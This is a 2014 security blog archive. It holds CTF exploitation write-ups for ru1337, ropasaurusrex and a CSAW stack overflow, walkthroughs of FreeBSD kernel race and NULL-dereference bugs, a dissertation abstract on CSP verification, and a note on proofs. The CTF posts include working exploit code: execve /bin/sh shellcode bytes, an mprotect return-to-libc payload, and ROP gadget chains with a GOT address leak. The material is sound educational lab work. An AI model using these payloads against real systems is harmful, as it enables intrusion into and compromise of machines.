Thursday, 20 November 2014

What's a proof good for?

Reading "Weird Machines" [1] a paragraph jumped out:
Following [2], we distinguish between formal proofs and the forms of mathematical reasoning de-facto communicated, discussed, and checked as proofs by the community of practicing mathematicians. The authors observe that a long string of formal deductions is nearly useless for establishing believability in a theorem, no matter how important, until it can be condensed, communicated, and verified by the mathematical community. The authors of [2] extended this community approach to validation of software—which, ironically, the hacker research community approaches rather closely in its modus operandi, as we will explain. 
It indicates that people don't care for proof as much as they should. More chillingly, it highlights how much people are driven by emotion versus reason. So, [2] quickly jumped up my list of papers to read.

[1] Sergey Bratus, Michael E. Locasto, Meredith L. Patterson, Len Sassaman, and Anna Shubina, "From Buffer Overflows to "Weird Machines" and Theory of Computation,"

[2] Richard A. DeMillo, Richard J. Lipton, and Alan J. Perlis, “Social Processes and Proofs of Theorems and Programs,” technical report, Georgia Institute of Technology, Yale University, 1982:

Saturday, 23 August 2014

29C3 ru1337

Let's look at another CTF challenge. This one is from the 29C3 CTF exploitation ru1337. Unlike other challenges, this one does not look like it represents a real world scenario but rather a creative puzzle.

The code is quite small. It has the basic accept - fork pattern at the beginning and runs this function:

What stands out is the call eax instruction. It looks like the code actually executes some memory from the data segment. Let's try to find out what that memory is because the call is slightly unusual. We go to analyze the first function call within this routine - sub_80487E1.

In the function we notice a call to mmap to allocate the strange memory buffer:

There are several interesting things about this call. First, it requests the location to be at 0x0BADC0DE. Second, the permissions are set to READ|WRITE but not EXECUTE. This is interesting because just above we see this mmapped buffer being executed. Fear not, the signal handler will catch the error.

Next we see that the user sends in a user name into a buffer on the stack. The recv call is requested to read 44 bytes from the socket:

The peculiar thing is that the sub instruction places the destination buffer at ebp-18h, which is only 8 bytes away from the next thing on the stack. The portion of the stack looks like this:

So, we are going to go ahead and overwrite that base pointer and return address with a buffer that is longer than 24 bytes. There are, however, some trivial restrictions on what our username input can be. The reader should follow to address 0x080488C8 in the binary. It will show that the username is checked to contain only ASCII alpha characters and NULL or NL characters. So, to get around that we will simply provide capital letters as the username.

Next, the function will request a password, which is also written on the stack at ebp-94h, the 's' variable:

The 's' buffer is actually 128 bytes long and the recv call reads 128 bytes. So, there is no overflow here. However, the following statements will write to the previously mmapped buffer (dest buffer). They will use strcpy to copy both the username and the password to the dest buffer. The password will be offset by 8 bytes, presumably because the username is expected to be at most 8 bytes long. For this reason we will need to make sure that the first 8 bytes of the username are actually executable, but not too damaging, code.

To recap, we've seen that we can overwrite the return address and much of the stack, and we can control the contents of 0x0BADC0DE. However, 0x0BADC0DE is not executable, but we'd like it to be!

We notice that the binary imports the mprotect function which can change permissions on memory pages:

We shall implement the classic return-to-libc style attack. The return address of our bad function is set to 0x08048580 (the imported mprotect). Since mprotect needs a page-aligned address, the exploit passes 0x0BADC000 as the first parameter, 0x400 (arbitrary, really) for the length and 4 for the permissions. Note that 4 is PROT_EXEC on its own, not the full RWX set, which would be 7. Then to run our shellcode we set mprotect's own return address to 0x0BADC000 as well, which will let us exec a shell. The exploit code looks like this:

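  import struct
  import sys

  def uint(value):
      # pack a 32-bit little-endian word
      return struct.pack('<I', value)

  buf  = b'PPPP'                 # 'P' is push eax: harmless executable filler
  buf += b"PPPPAAADAAAEAAA\x00"
  buf += uint(0x0BADC000) # saved EBP
  buf += uint(0x08048580) # EIP: mprotect
  buf += uint(0x0BADC000) # mprotect return address (our code)
  buf += uint(0x0BADC000) # mprotect addr argument
  buf += uint(0x400)      # mprotect len argument
  buf += uint(0x00000004) # mprotect prot argument (PROT_EXEC)
  buf += b"AAAF"
  buf += b"\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f"
  buf += b"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
  buf += b"A"*110

  # write raw bytes so nothing gets re-encoded on the way out
  sys.stdout.buffer.write( buf )
  sys.stdout.buffer.write( b";\nls;cat flag\n" )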

We just netcat that to the listener and read the flag. Simples! The reason we can use the exec /bin/sh shellcode is because the function we exploited conveniently dup2's STDIN/OUT to the socket.

Thursday, 5 June 2014


Return Oriented Programming (ROP) is all the rage! Well, almost, but it is needed when you can control the stack but cannot execute from it, i.e. with ASLR and NX. In this post I present my solution to ropasaurusrex, which leveraged ROP. First the overflow:

It really doesn't get easier than this. There is a buffer on the stack which is much smaller than 256 bytes, and there is a read into that buffer of 256 bytes. We overwrite the return address and set the EIP free. The leave instruction in the epilogue means that we can't just find a 'jmp esp' somewhere and easily use it. Also, I wanted to practice my ROP skills so I didn't consider any other exploitation vectors. So, we are going to build a ROP stack.

Aside from our binary there are two loaded modules:
(gdb) info sharedlibrary  
From        To          Syms Read   Shared Object Library 
0xf7e2f420  0xf7f5e6ee  Yes (*)     /lib32/ 
0xf7fdc860  0xf7ff47ac  Yes (*)     /lib/
I will be using libc for finding my gadgets. What are gadgets? Using ROP is like lining up dominoes and then letting them fall in some path. The only difference is that in ROP we might actually be able to make decisions because we can point to conditional instructions. In this case gadgets are the domino pieces that we line up by placing their addresses on the stack. The addresses are 'return' addresses pointing to the next gadget as if the next gadget has actually called the previous. Probably a convoluted explanation but it will make sense soon.

Imagine you have the following C code:
int a = 0; 
void A() { a++; return; } 
void B() { A(); a += 2; return; } 
void C() { B(); a += 3; return; }
That, in essence, represents what a ROP chain is: a list of gadgets. Starting with function C, by the time function A is invoked the stack will contain return addresses back to functions C and B in order. The actual useful 'work' parts are the increments of the variable 'a'. For this to be a proper ROP chain we will logically take out all the call instructions to any of the functions and just pretend that they happened. Then we will point EIP to the 'a++' statement and let the code run. We want to do that because we want function A to do its operation first. When A returns, it will return 'back' to B, executing 'a += 2', and so on.
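The return-address bookkeeping described above can be mimicked in a few lines of Python. This is only a toy model, not exploitation code: the `gadgets` table and its addresses are made up for illustration, and each "gadget" is a Python function standing in for the useful instructions that sit in front of a `ret`.

```python
# Toy model of a ROP chain: the "stack" holds fake return addresses and
# every gadget ends by "returning" to whatever address comes next.
state = {"a": 0}

def work_a():
    state["a"] += 1   # the 'a++' from A

def work_b():
    state["a"] += 2   # the 'a += 2' from B

def work_c():
    state["a"] += 3   # the 'a += 3' from C

# Hypothetical addresses, chosen arbitrarily for this sketch.
gadgets = {0x1000: work_a, 0x2000: work_b, 0x3000: work_c}

def run_chain(stack):
    """Consume addresses one at a time, like a series of ret instructions."""
    order = []
    pending = list(stack)
    while pending:
        address = pending.pop(0)   # 'ret' pops the next return address
        gadgets[address]()         # run the useful part of the gadget
        order.append(address)
    return order

# EIP starts at A's work; the stack then "returns" into B and C.
executed = run_chain([0x1000, 0x2000, 0x3000])
print([hex(x) for x in executed], state["a"])
```

No call instruction ever runs here. The order of the addresses on the stack alone decides which piece of work executes next, which is the whole trick.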

With this logic we can set up a theoretically arbitrary control flow. ROP has been shown to be Turing complete [1], although in practice that might be tougher to achieve. There is also a similar method called Jump Oriented Programming [2] (JOP) which uses a dispatch address table and jump instructions to control the flow of execution. It is similar to how C-style switch statements operate.

Back to our code. The EIP is trivially controlled, so let's talk about what we will do with it. To practice ROP I have disabled ASLR on my virtual machine by writing 0 to /proc/sys/kernel/randomize_va_space. This allows me to make assumptions about where my libc module is loaded at the time of exploitation. I will be looking at leaking addresses next time.

The target application reads and writes on standard I/O. This means that I will be feeding the exploit through a pipe on the command line. So to get the ropasaurus to execute my commands I will have it execve a shell and then have access to any sort of shell commands. For this we will need the execve shellcode... but in ROP form.

We will use the execve system call (number 0xB) via interrupt 0x80. So, somehow, we need to set up the registers as follows. Remember that Linux system calls expect parameters to be passed via registers.

    EAX = 0xB              // System call number
    EBX = PTR to "/bin/sh" // File to execute
    ECX = NULL             // Program arguments
    EDX = NULL             // Program environment

Once the registers are set up we call interrupt 0x80 and the kernel takes care of the rest. I like this method because there is no need to do any clean up. The only thing we should be aware of is that the shell will start reading STDIN looking for commands. This happens after ropasaurus has read 256 bytes. So our exploit buffer needs to contain the shell commands after the first 256 bytes (e.g. cat /etc/passwd).

At the minimum we want to replicate the functionality of this code:

(Courtesy of the Online Disassembler)

We do this by finding gadgets in the libc image. Using an online tool, ropshell, I was able to generate a searchable list of all possible gadgets. Basically those are all the possible instruction sequences that end with a return or a jump instruction.

So we put together a "shellcode" sequence that looks like this. Think of it as a sequence of pointers to the instructions to be executed, not the actual instruction bytes sent to the program. At the beginning I notice that ECX has the pointer to our buffer. So I need to pivot the stack and have ESP point to it. We point the EIP to the first instruction:

    pop edx      'preparing for the next jmp.
    mov esp, ecx 'stack pivot
    jmp edx      
    pop ecx      'now at the beginning
    pop eax      '[pop #1]

This sequence allows us to "wrap" around ESP to the beginning of our buffer which gives us more space to play. Considering how the overflow worked this might not have been entirely necessary as there would probably be enough space to write the rest of the ROP chain. But it's done now.

In each case the ret and jmp instructions are set up such that they point to the next instruction to execute. In reality the EIP is jumping all around the libc text section. Next, we set up the registers to prepare for the system call.

    push esp
    pop ebx       'point near /bin/sh
    pop esi
    add ebx, eax  '[pop #1] adjusts ebx
    add eax, 2
    pop edx       'program environment
    add al, -0x17 'set EAX to 0xB
    int 0x80

Done. Once this sequence executes we will have the shell. Notice that it is far less straightforward than the nice, no hacking, solution. Here we use EAX to adjust the EBX pointer before it is fixed up to be the system call number. The stack buffer is built up using this Python code:

buf += uint(0)            # the ecx for g2
buf += uint( (0xB + 0x17 - 2) ) # the eax for g2
buf += gadget(0x0010D251) # ret of g2 going to g3:
buf += 'AAAA'             # value for esi of g3
buf += gadget(0x00143242) # g4: add ebx, eax; add eax, 2; ret
buf += gadget(0x0002E3CC) # g7: pop edx; ret
buf += uint(0)            # value of edx for g7
buf += gadget(0x0010A44D) # g6: add al, -0x17; ret
buf += gadget(0x000EA621) # g5: int 0x80
buf += '/bin'
buf += '/sh\x00'
buf += "/bin/bash\x00"

buf = padwith(buf, 0x100-4*29)

# return address (initial EIP)
buf += gadget(0x0002E3CC) # g0: pop edx; ret

buf += gadget(0x000EE100) # value of edx for gadget 0
buf += gadget(0x0002E49D) # g1: mov esp, ecx; jmp edx

buf = padwith(buf, 0x100) # make exactly 256 bytes
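To see why the value popped into EAX is 0xB + 0x17 - 2, it helps to replay the register arithmetic of the chain. The snippet below is just a sanity check in Python, not part of the exploit. The function name and the starting ESP value are made up for the demonstration.

```python
MASK32 = 0xFFFFFFFF

def replay_registers(esp, popped_eax):
    """Replay the register effects of the gadgets leading up to int 0x80."""
    eax = popped_eax                      # pop eax  [pop #1]
    ebx = esp                             # push esp; pop ebx
    ebx = (ebx + eax) & MASK32            # add ebx, eax
    eax = (eax + 2) & MASK32              # add eax, 2
    al = ((eax & 0xFF) - 0x17) & 0xFF     # add al, -0x17 touches only the low byte
    eax = (eax & 0xFFFFFF00) | al
    return eax, ebx

# 0x1000 is an arbitrary, hypothetical stack pointer.
eax, ebx = replay_registers(0x1000, 0xB + 0x17 - 2)
print(hex(eax), hex(ebx))
```

EAX ends up as 0xB, the system call number, while EBX has moved 0x20 bytes past the stack pointer it was copied from, which is how it gets nudged towards the "/bin/sh" string.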

The addresses are the values given by the ROPShell tool, but the Python code outputs the corrected addresses by adding the base address of libc. Once executed we can feed the shell any commands that we want.
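The listing relies on three small helpers, uint, gadget and padwith, which are not shown in the post. A minimal sketch of what they might look like follows. The bodies are my assumption, the LIBC_BASE value is a placeholder rather than the real load address, and this version works on bytes where the original listing used plain strings.

```python
import struct

# Hypothetical placeholder; the real value is wherever libc is mapped.
LIBC_BASE = 0xF7E00000

def uint(value):
    """Pack a value as a 32-bit little-endian word."""
    return struct.pack("<I", value & 0xFFFFFFFF)

def gadget(offset, base=LIBC_BASE):
    """Turn a gadget offset inside libc into an absolute address word."""
    return uint(base + offset)

def padwith(buf, length, filler=b"A"):
    """Pad buf with filler bytes until it is exactly length bytes long."""
    if len(buf) > length:
        raise ValueError("buffer already longer than requested length")
    return buf + filler * (length - len(buf))

chain = uint(0) + gadget(0x0002E3CC)
chain = padwith(chain, 0x100)
print(len(chain))
```

Keeping the base address as a parameter means the same chain can be rebuilt once the real base is known, for instance after a leak.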


Update: I couldn't just let this one go without a full exploit. I've spent a little bit more time and developed a mechanism to leak out an address of a function within libc which gave me a chance to calculate the base address of the libc module.

The exploit works like this. First we send in 256 bytes to leak out an address, then we send 256 bytes to execute a shell. It's a two stage exploit, which also means that it becomes interactive.

First, we notice that the binary was compiled without RELRO which means that the GOT PLT will be at a known address. The PLT contains dynamically generated addresses to library functions. There is a good write up of how it works on the ISISBlogs. So, we need to figure out a way to get those addresses.

The way I've done it is to point the initial return address to the write function in the PLT entry and on the stack I've put in the parameters for the write call. Essentially I simulate the call to write once the function containing a read returns. This write will send back 0x1C bytes of the PLT - the entire table. On the same stack I put in the address of the main function, so that I could start the process again allowing me another shot at the bug knowing the location of the write function. At this point, see the beginning of the blog.

The code for the leak looks like this:

   buf = padwith(buf, 0x100-4*29)

   # return address (initial EIP)
   buf += addr(0x08048312) # point to write@plt
   buf += addr(0x0804841D) # return main 
   buf += uint(1)          # STDOUT
   buf += uint(0x08049614) # point to the plt for write
   buf += uint(0x1c)       # write buffer size

   buf = padwith(buf, 0x100) 

Works every time.
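On the receiving side, the leaked bytes have to be turned into a libc base address. The sketch below shows one way to do that arithmetic. The function names, the fake leak data, and the WRITE_INDEX and WRITE_OFFSET values are all made up; the real position of write in the table and its offset inside libc have to be read from the actual binaries.

```python
import struct

def parse_leak(leak):
    """Split the leaked bytes into 32-bit little-endian addresses."""
    count = len(leak) // 4
    return list(struct.unpack("<%dI" % count, leak[:count * 4]))

def libc_base_from(leaked_address, symbol_offset):
    """Base = runtime address of a symbol minus its offset inside libc."""
    return (leaked_address - symbol_offset) & 0xFFFFFFFF

# Made-up example data: 0x1C bytes hold seven 4-byte entries.
fake_leak = struct.pack("<7I", *[0xF7E00000 + 0x1000 * i for i in range(7)])
entries = parse_leak(fake_leak)

WRITE_INDEX = 3          # hypothetical position of write in the table
WRITE_OFFSET = 0x3000    # hypothetical offset of write inside libc
base = libc_base_from(entries[WRITE_INDEX], WRITE_OFFSET)
print(hex(base))
```

With the base in hand, the gadget offsets from the first stage can be converted into absolute addresses for the second 256 bytes.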


[1] E. Buchanan, R. Roemer, H. Shacham, and S. Savage. When Good Instructions Go Bad: Generalizing Return-Oriented Programming to RISC. In 15th ACM CCS, pages 27–38, New York, NY, USA, 2008. ACM.

[2] T. Bletsch, X. Jiang, V. Freeh and Z. Liang. Jump-Oriented Programming: A New Class of Code-Reuse Attack. ASIACCS ’11, March 22–24, 2011, Hong Kong, China.

Thursday, 22 May 2014

The winter of 2014 was cold.

During January and February of 2014 I set myself an objective: to finish the masters dissertation to the point of submission. I also learned that picking a hard topic was probably not the best idea, but it was certainly rewarding. Nonetheless, I still received a distinction (the Oxford version of an A) for the work. So, I'm happy to share it with the world, welcoming any sort of feedback.

If you're interested you can read the full paper here: The full paper

Personal computing devices and servers are becoming more powerful by the day through hardware parallelisation. Such advances require developers to look into concurrency in order to take advantage of the new computing power. However, much of the code is written without formal verification and checked only heuristically through unit or other tests. This dissertation will show how Communicating Sequential Processes (CSP) can be used to detect errors in an application that supports concurrent execution. This is done by isolating common concurrency problems and mapping them into CSP representations. Finally, the Failures-Divergences Refinement (FDR) software package is used to perform refinement checks to detect the errors in the source code. This process allows the developer to build assertions that their code must pass to prove its correctness. 

I would like to thank my advisor, Dr. Andrew Simpson, and the Software Engineering Program staff for their guidance and quick responses. This project could not have been accomplished without the generosity, patience and accommodation of the family scholarship fund. I am particularly grateful to the American people for providing the opportunity and the Lithuanian people for their infinitely delicious food and heavenly honey. Finally, I wish to thank my wife, Diana, for her love, support and conversation. 

Wednesday, 21 May 2014

A simple one

CTF challenges can be great fun. One evening I had a few minutes and decided to work through a simple one from CSAW. Here's the breakdown:

A server listens on TCP port 31338. It forks on a connection, creating a new process for each client. The server sends some data and reads some data into a buffer. At that point the handling function either calls exit or returns. The last part is interesting because on return the exploit can succeed and gain execution. If the exploit fails to set up the stack correctly, the process will exit without giving us execution.

This challenge is a good starter, although I would not expect this sort of situation to come up anymore, except perhaps in old or deliberately bad software. It was more common in the 90's. The value of the exercise is in going through the motions of learning how stack corruption vulnerabilities work.

First, a connection comes in. The server forks to create a new process:

The handle function is called with the client socket file descriptor as the first parameter. Here we see a modern compiler convention to place the parameters on the stack using a mov instruction. Older compilers usually use the push instruction. The end result is the same because at the time of the call the first thing on the stack (i.e. [esp]) is the first parameter. This fits the calling convention used by the called function.

The handle function has several things in its stack frame: buffer, some byte variable, 32bit integer:

We see from its large offset that the buffer is 2047 bytes in size. Specifically, that is the distance between the buffer and the next variable: 0x80C - 0xD, which is 2060 - 13 = 2047. I called the next variable 'zero' because that is the value that will be assigned to it after the overflow happens. The cookie actually simulates a stack canary, implemented early on by compilers to protect against stack-based buffer overflows. We'll see later how that can be overcome for this challenge.

The cookie will contain a random value seeded off of the time that the handle function runs. At first glance I was thinking that we would have to try to guess it based on the approximate time of the server. But it gets better. Here we can see the assignment:

We can also see that the cookie is being saved off to a location in the data segment called secret. Later, that is how the function will know if the cookie has been corrupted.

Let's look at the next interesting chunk of code:

There are two calls to the send function. The first one loads the address of the buffer as the parameter, which actually sends the stack location of the buffer. The second send loads up the cookie and sends that to the client. So we really have all the information we need. This would also explain the funny characters we get upon connection to the server.

Finally, the overflow occurs when the receive function is called. That is because it reads 4096 bytes into a 2047 byte buffer. 

After the receive, the zero variable is assigned a zero value (just one byte). This is here just to make things slightly harder for you. Next the cookie is checked against the secret value. If the values match then the function jumps away to return. The return is what will trigger the exploit and give us the code execution. If the values do not match, then the code falls through and executes exit.

So the stack looks like this:
(low addr)
 [ 2047 bytes ] | [ zero byte] | [cookie] | [ few registers ] | [return addr] | [ socket]
(high addr)

This means that we need to write to the socket a value large enough to overwrite the return address which will become the EIP when the retn instruction is executed. So the actual exploit looks like this:

This code will read from the socket the address of the buffer and the cookie which will allow us to put those values into the exploit string.
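As a rough illustration of the idea, here is a sketch of how such a payload could be assembled in Python. It is not the original exploit. It assumes the server sends the buffer address and the cookie as two 4-byte little-endian values, and the saved_regs_len default of 12 bytes is a guess at the "few registers" in the diagram. The function names and the one-byte stand-in shellcode are placeholders too.

```python
import struct

BUFFER_SIZE = 2047  # distance between the buffer and the 'zero' byte

def parse_greeting(data):
    """Assumed layout: 4 bytes of buffer address, then 4 bytes of cookie."""
    buf_addr, cookie = struct.unpack("<II", data[:8])
    return buf_addr, cookie

def build_payload(buf_addr, cookie, shellcode, saved_regs_len=12):
    """Lay the bytes out in the same order as the stack diagram."""
    if len(shellcode) > BUFFER_SIZE:
        raise ValueError("shellcode does not fit in the buffer")
    payload = shellcode.ljust(BUFFER_SIZE, b"\x90")  # fill the buffer
    payload += b"\x00"                               # the 'zero' byte
    payload += struct.pack("<I", cookie)             # keep the cookie intact
    payload += b"B" * saved_regs_len                 # saved registers (guess)
    payload += struct.pack("<I", buf_addr)           # return into the buffer
    return payload

# Made-up values standing in for what the server would send.
addr, cookie = parse_greeting(struct.pack("<II", 0xBFFFE000, 0x1234ABCD))
payload = build_payload(addr, cookie, b"\xcc")
print(len(payload))
```

In a real run the eight greeting bytes would come from the socket on port 31338 and the payload would be written straight back to it. Because the cookie is echoed back unchanged, the check against secret passes and the function returns into the buffer.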

Simple! Right? Well, not if you've never done this before.

Saturday, 25 January 2014


About the same time as the pipe vulnerability, a devfs race condition was discovered. This vulnerability manifested itself as an uninitialized vnode pointer being used. The pointer would be NULL and could be used by another process before it was assigned to an actual vnode. The vulnerability doesn't have a specific "place" in the code because it is a product of how devfs and vfs interact. However, the fix was made in devfs.

The bug turned out to be exploitable, with the exploit nicely described in a XORL blog post. I will be going into a little more detail about the code paths leading to the vulnerability.

First a process tries to open a devfs file (e.g. /dev/null or similar). This is done through the open system call, which eventually executes the kern_open kernel function.

kern_open(struct thread *td, char *path, enum uio_seg pathseg, int flags, int mode)
/* An extra reference on `nfp' has been held for us by falloc(). */
fp = nfp;
cmode = ((mode &~ fdp->fd_cmask) & ALLPERMS) &~ S_ISTXT;
NDINIT(&nd, LOOKUP, FOLLOW, pathseg, path, td);
td->td_dupfd = -1; /* XXX check for fdopen */
error = vn_open(&nd, &flags, cmode, indx);
Almost at the very beginning the call goes down the path of vn_open which executes the VFS specific functionalities. vn_open performs many checks, such as does the user have access to the file or are the access flags correct? It eventually passes control to the devfs subsystem for the actual device opening:

vn_open_cred(ndp, flagp, cmode, cred, fdidx)
struct nameidata *ndp;
int *flagp, cmode;
struct ucred *cred;
int fdidx;
vfslocked = 0;
fmode = *flagp;
ndp->ni_cnd.cn_nameiop = LOOKUP;
ndp->ni_cnd.cn_flags = ISOPEN |
   ((fmode & O_NOFOLLOW) ? NOFOLLOW : FOLLOW) |
if ((error = namei(ndp)) != 0)
return (error);
ndp->ni_cnd.cn_flags &= ~MPSAFE;
vfslocked = (ndp->ni_cnd.cn_flags & GIANTHELD) != 0;
vp = ndp->ni_vp;
if ((error = VOP_OPEN(vp, fmode, cred, td, fdidx)) != 0)
goto bad;
if (fmode & FWRITE)
*flagp = fmode;
ASSERT_VOP_LOCKED(vp, "vn_open_cred");
if (fdidx == -1)
return (0);
*flagp = fmode;
ndp->ni_vp = NULL;
return (error);
Here the call is passed through to devfs via the VOP_OPEN macro call.
static int
devfs_open(struct vop_open_args *ap)
dsw = dev_refthread(dev);
if (dsw == NULL)
return (ENXIO);
/* XXX: Special casing of ttys for deadfs.  Probably redundant. */
if (dsw->d_flags & D_TTY)
vp->v_vflag |= VV_ISTTY;
VOP_UNLOCK(vp, 0, td);
vn_lock(vp, LK_EXCLUSIVE | LK_RETRY, td);
fp = ap->a_td->td_proc->p_fd->fd_ofiles[ap->a_fdidx];
KASSERT(fp->f_ops == &badfileops,
    ("Could not vnode bypass device on fdops %p", fp->f_ops));
fp->f_ops = &devfs_ops_f;
fp->f_data = dev;
return (error);
So far so good, nothing terribly bad has happened, there is no memory corruption. However, the problem is that right after the VOP_UNLOCK(vp, 0, td) call another thread can start using the file descriptor. If the second thread does not check the vnode pointer then it would be in trouble. At this point the kernel has not assigned the vnode to the file descriptor (fp) structure.

This assignment happens later in the kern_open call in the same execution thread. In fact, it happens just before the function returns to the user land.
kern_open(struct thread *td, char *path, enum uio_seg pathseg, int flags,
    int mode)
if (fp->f_count == 1) {
mp = vp->v_mount;
KASSERT(fdp->fd_ofiles[indx] != fp,
   ("Open file descriptor lost all refs"));
VOP_UNLOCK(vp, 0, td);
vn_close(vp, flags & FMASK, fp->f_cred, td);
fdrop(fp, td);
td->td_retval[0] = indx;
return (0);
fp->f_vnode = vp;
if (fp->f_data == NULL)
fp->f_data = vp;
fp->f_flag = flags & FMASK;
if (fp->f_ops == &badfileops)
fp->f_ops = &vnops;
fp->f_seqcount = 1;
fp->f_type = (vp->v_type == VFIFO ? DTYPE_FIFO : DTYPE_VNODE);
The fp->f_vnode = vp assignment above is where it happens. As mentioned before, it is too late by that time and there is a danger that the pointer could already have been used. That is exactly what happened in the exploit code. The fix was to go back to the devfs_open call, break the abstraction, and assign the vnode to the file descriptor right after the unlock happens.
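The ordering problem can be shown with a deliberately simplified model in Python. This is a toy, not kernel code: the FileEntry class and the step functions are stand-ins for illustration, and the "threads" are just steps run in a chosen order so that the outcome is deterministic.

```python
class FileEntry:
    """Stand-in for the kernel's struct file; only two fields are modelled."""
    def __init__(self):
        self.f_ops = "badfileops"
        self.f_vnode = None          # NULL until kern_open assigns it

def devfs_open(fp):
    # devfs_open drops the vnode lock and installs its own file operations.
    fp.f_ops = "devfs_ops_f"

def kern_open_tail(fp, vnode):
    # The late assignment at the end of kern_open.
    fp.f_vnode = vnode

def second_thread(fp):
    # Another thread using the descriptor without checking the vnode pointer.
    if fp.f_vnode is None:
        return "NULL vnode used"
    return "vnode ok"

def run(interleaving):
    """Run the named steps in order; return what the second thread saw."""
    fp = FileEntry()
    steps = {
        "devfs_open": lambda: devfs_open(fp),
        "kern_open_tail": lambda: kern_open_tail(fp, "vnode"),
        "second_thread": lambda: second_thread(fp),
    }
    results = [steps[name]() for name in interleaving]
    return results[interleaving.index("second_thread")]

racy = run(["devfs_open", "second_thread", "kern_open_tail"])
safe = run(["devfs_open", "kern_open_tail", "second_thread"])
print(racy, "/", safe)
```

Moving the vnode assignment into devfs_open, as the fix did, closes the window in which the first interleaving is possible.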

Saturday, 18 January 2014


Code seems to age much quicker than anything else. Way back - not so long ago - in 2009 there was a bug in the FreeBSD kernel PIPE and EVENT handling code. This turned out to be exploitable in versions 6.x of the kernel. It was never truly patched; however, the code was redesigned in order to eliminate a whole set of potential vulnerabilities including this one. The bug was published in the FreeBSD security advisory FreeBSD-SA-09:13.pipe.asc. A proof of concept exploit is available for this vulnerability:

For this analysis I needed to figure out what sequences of events lead to the vulnerability manifestation. I won't go into details about how the corruption happened and how the exploit works. Also, I haven't actually tried to execute it - so, I'm merely assuming that it works.

Unless you know the details of how kqueues, knote lists and pipes work, this vulnerability is actually quite hard to spot even if the patch is available. The patch covers a lot of code and does not highlight the bug itself. So, if for some strange reason you're trying to figure out this vulnerability then this post should give you the initial steps.

The vulnerable version of the kernel is still available in the current (as of this writing) FreeBSD SVN: All analysis below follows that code.

We start with function pipe_close which gets called via the close system call.
static int
pipe_close(fp, td)
    struct file *fp;
    struct thread *td;
    struct pipe *cpipe = fp->f_data;

    fp->f_ops = &badfileops;
    fp->f_data = NULL;
    return (0);
This function obtains the pipe structure and sends it on to the pipeclose function. It is important to note that a pipe has two parts, the read end and the write end, but it is one entity. The pipe pair is allocated from the same UMA (Universal Memory Allocator) zone as one chunk of memory. So, really the read/write pipes refer to the same general space.

Pipeclose then obtains the pair and tries to flush the pipe and clear out any knotes attached to it. A knote is a special mechanism used for kernel to user event notification. In very basic terms it is a select optimized for a special case. In select the user has to pass a whole list of identifiers to the kernel while with a knote a user subscribes to a filter (the event criteria) and allows for a much more granular event notification. The user process maintains a kqueue of the events it is listening on while each identifier being listened on maintains a knote linked list to know who to notify. A much more detailed description of this mechanism can be found in this paper: kqueue.pdf.

Once various closing/flushing processes are complete the pipeclose function tries to clear out the pipe by starting with the knote list. About half way down the list, the following sequence is executed:
static void
      struct pipe *cpipe;
      struct pipepair *pp;
      struct pipe *ppipe;
      cpipe->pipe_present = 0;
      knlist_clear(&cpipe->pipe_sel.si_note, 1);

Can you spot the bug? The above code is basically it. I wouldn't expect you to, unless you're a kernel hacker for this particular portion of the kernel. Specifically, the last two lines in the above listing cause the problem.

  • The PIPE_LOCK mutex isn't protecting the pipe, it is protecting the pipelock mutex.
  • The pipe is UNLOCKED by the pipeunlock call before calls to knlist_clear and knlist_destroy are made.
This means that two processes can be calling knlist_clear and knlist_destroy unsafely. Both of those functions are not thread safe. So, it can happen that a linked list of knotes for the pipe is reinitialized (via the destroy call) while it is still being cleared. The clearing is a blocking procedure that sends out notifications to processes on the knote list. While the clearing function is traversing the same linked list it could easily be destroyed by another process because that process sees an already cleared list.

Thursday, 9 January 2014


Older FreeBSD 7 and 8 versions had a bug in the pseudofs module - back in 2010. This bug manifested through an unnecessary mutex release which turned out to be exploitable through a NULL pointer dereference. In this post I will do a walk through to show the events that lead up to the bug. For more information check out the security advisory: FreeBSD-SA-10:09.pseudofs.asc. There is also a proof of concept exploit available on Security Focus.

The chain starts with a call to extattr_get_link in kern/vfs_extattr.c
ssize_t extattr_get_link(const char *path, int attrnamespace,
const char *attrname, void *data, size_t nbytes);
This obtains extended attributes from a vnode. The function looks like this:
int extattr_get_link(td, uap)
struct thread *td;
struct extattr_get_link_args /* {
const char *path;
int attrnamespace;
const char *attrname;
void *data;
size_t nbytes;
} */ *uap;
vfslocked = NDHASGIANT(&nd);
error = extattr_get_vp(nd.ni_vp, uap->attrnamespace, attrname,
   uap->data, uap->nbytes, td);
return (error);
The important part is the call to extattr_get_vp. This is essentially a wrapper adding a few bells and whistles to the process.
static int
extattr_get_vp(struct vnode *vp, int attrnamespace, const char *attrname,
    void *data, size_t nbytes, struct thread *td)
struct uio auio, *auiop;
struct iovec aiov;
ssize_t cnt;
size_t size, *sizep;
int error;
vn_lock(vp, LK_EXCLUSIVE | LK_RETRY);
error = VOP_GETEXTATTR(vp, attrnamespace, attrname, auiop, sizep,
   td->td_ucred, td);
if (auiop != NULL) {
cnt -= auio.uio_resid;
td->td_retval[0] = cnt;
} else
td->td_retval[0] = size;
VOP_UNLOCK(vp, 0);
return (error);
We are starting to see a few statements directly relating to the vulnerability. First there is the vn_lock
vn_lock(vp, LK_EXCLUSIVE | LK_RETRY);
which takes in the vnode pointer that we are interested in. This is the call that locks the vnode and the mutex in question. The code for that is slightly convoluted. Instead of using mtx_lock,  it works by invoking the lock manager.
// in kern/vfs_vnops.c
#define vn_lock(vp, flags) _vn_lock(vp, flags, __FILE__, __LINE__)
_vn_lock(struct vnode *vp, int flags, char *file, int line)
int error;
VNASSERT((flags & LK_TYPE_MASK) != 0, vp,
   ("vn_lock called with no locktype."));
do {
error = VOP_LOCK1(vp, flags, file, line);            
flags &= ~LK_INTERLOCK; /* Interlock is always dropped. */
} while (flags & LK_RETRY && error != 0);
return (error);
The function passes control to the VOP_LOCK1 macro. Here the control goes into the custom pseudofs territory. The module, however, does not implement the lock function and so a default locking function is used.
// kern/vfs_default.c
struct vop_lock1_args /* {
struct vnode *a_vp;
int a_flags;
char *file;
int line;
} */ *ap;
struct vnode *vp = ap->a_vp;
return (_lockmgr_args(vp->v_vnlock, ap->a_flags, VI_MTX(vp),
Here we see that the default implementation passes the lock, vp->v_vnlock, to the lock manager via the _lockmgr_args function - a function too complex to show here and unnecessary for my purposes. The mutex is officially locked. Going back to extattr_get_vp we see a call to VOP_GETEXTATTR
error = VOP_GETEXTATTR(vp, attrnamespace, attrname, auiop, sizep,
    td->td_ucred, td);
